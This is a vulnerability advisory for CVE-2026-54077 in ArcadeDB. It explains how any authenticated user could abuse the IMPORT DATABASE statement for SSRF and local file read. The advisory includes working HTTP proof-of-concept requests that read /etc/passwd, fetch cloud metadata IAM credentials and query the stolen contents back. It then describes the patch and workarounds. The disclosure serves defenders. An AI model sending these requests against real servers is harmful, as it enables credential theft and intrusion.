high · 7.1CVE-2026-54077Jul 16, 2026

CVE-2026-54077: ArcadeDB IMPORT DATABASE SSRF and Local File Read

Pranav Khune
Penetration Testing Team Lead, SecureLayer7

Any authenticated ArcadeDB user could abuse the SQL IMPORT DATABASE statement to make the server fetch arbitrary internal URLs or read local files from disk, without needing admin rights.

Packagecom.arcadedb:arcadedb-engine
Ecosystemmaven
Affected< 26.6.1
Fixed in26.6.1

The problem

The SQL `IMPORT DATABASE` statement accepted `file://` and `http(s)://` source URLs and passed them directly to the importer with no privilege check and no network validation. Any user with access to the `/api/v1/command` or `/api/v1/query` HTTP endpoint could exploit this, not just root or administrators.

For SSRF, the server would fetch the supplied URL, including cloud metadata endpoints like `169.254.169.254`, and ingest the response body as queryable graph records. For local file read, supplying a `file://` path caused the server process to open and import that file, exposing its contents as records the attacker could then query.

A secondary hardening gap left the XML importer vulnerable to Billion Laughs entity-expansion DoS (CWE-776).

Proof of concept

A working proof-of-concept for CVE-2026-54077 in com.arcadedb:arcadedb-engine, with the exact payload below.

http
# 1. Local file read (read /etc/passwd via SQL command endpoint)
POST /api/v1/command/mydb HTTP/1.1
Host: arcadedb-server:2480
Authorization: Basic dXNlcjpwYXNz
Content-Type: application/json

{"language":"sql","command":"IMPORT DATABASE file:///etc/passwd"}

# 2. SSRF to cloud metadata endpoint
POST /api/v1/command/mydb HTTP/1.1
Host: arcadedb-server:2480
Authorization: Basic dXNlcjpwYXNz
Content-Type: application/json

{"language":"sql","command":"IMPORT DATABASE http://169.254.169.254/latest/meta-data/iam/security-credentials/"}

# Then query the imported records to retrieve the file/response contents
POST /api/v1/query/mydb HTTP/1.1
Host: arcadedb-server:2480
Authorization: Basic dXNlcjpwYXNz
Content-Type: application/json

{"language":"sql","command":"SELECT FROM V LIMIT 100"}

Pre-patch, `ImportDatabaseStatement.executeSimple()` called the importer directly with no permission gate, so any authenticated principal could reach `SourceDiscovery` with an arbitrary URL. `SourceDiscovery` opened `file://` paths with a plain `FileInputStream` and resolved `http(s)://` hosts with no address validation, satisfying CWE-22 and CWE-918 respectively.

The patch added an `updateSecurity` permission assertion in `ImportDatabaseStatement` (blocking non-admin callers outright), plus host-resolution checks in `SourceDiscovery` that reject addresses resolving to loopback, link-local, site-local, wildcard, or multicast ranges by default (controlled by `arcadedb.server.security.importBlockLocalNetworks`).

An optional `arcadedb.server.security.importAllowedLocalPaths` setting restricts which `file://` paths are permitted. The XML importer was also patched to disable DTD processing and external entity resolution, closing the entity-expansion vector.

The fix

Upgrade to ArcadeDB 26.6.1 (patched in PR #4422). In 26.6.1, `IMPORT DATABASE` requires the `updateSecurity` permission, so non-admin users receive a permission error. HTTP(S) imports to private/loopback/link-local networks are blocked by default. If you cannot upgrade immediately, restrict `/api/v1/command` and `/api/v1/query` access to trusted administrative users only.

Reported by Bin Luo.

References: [1][2][3]

Related research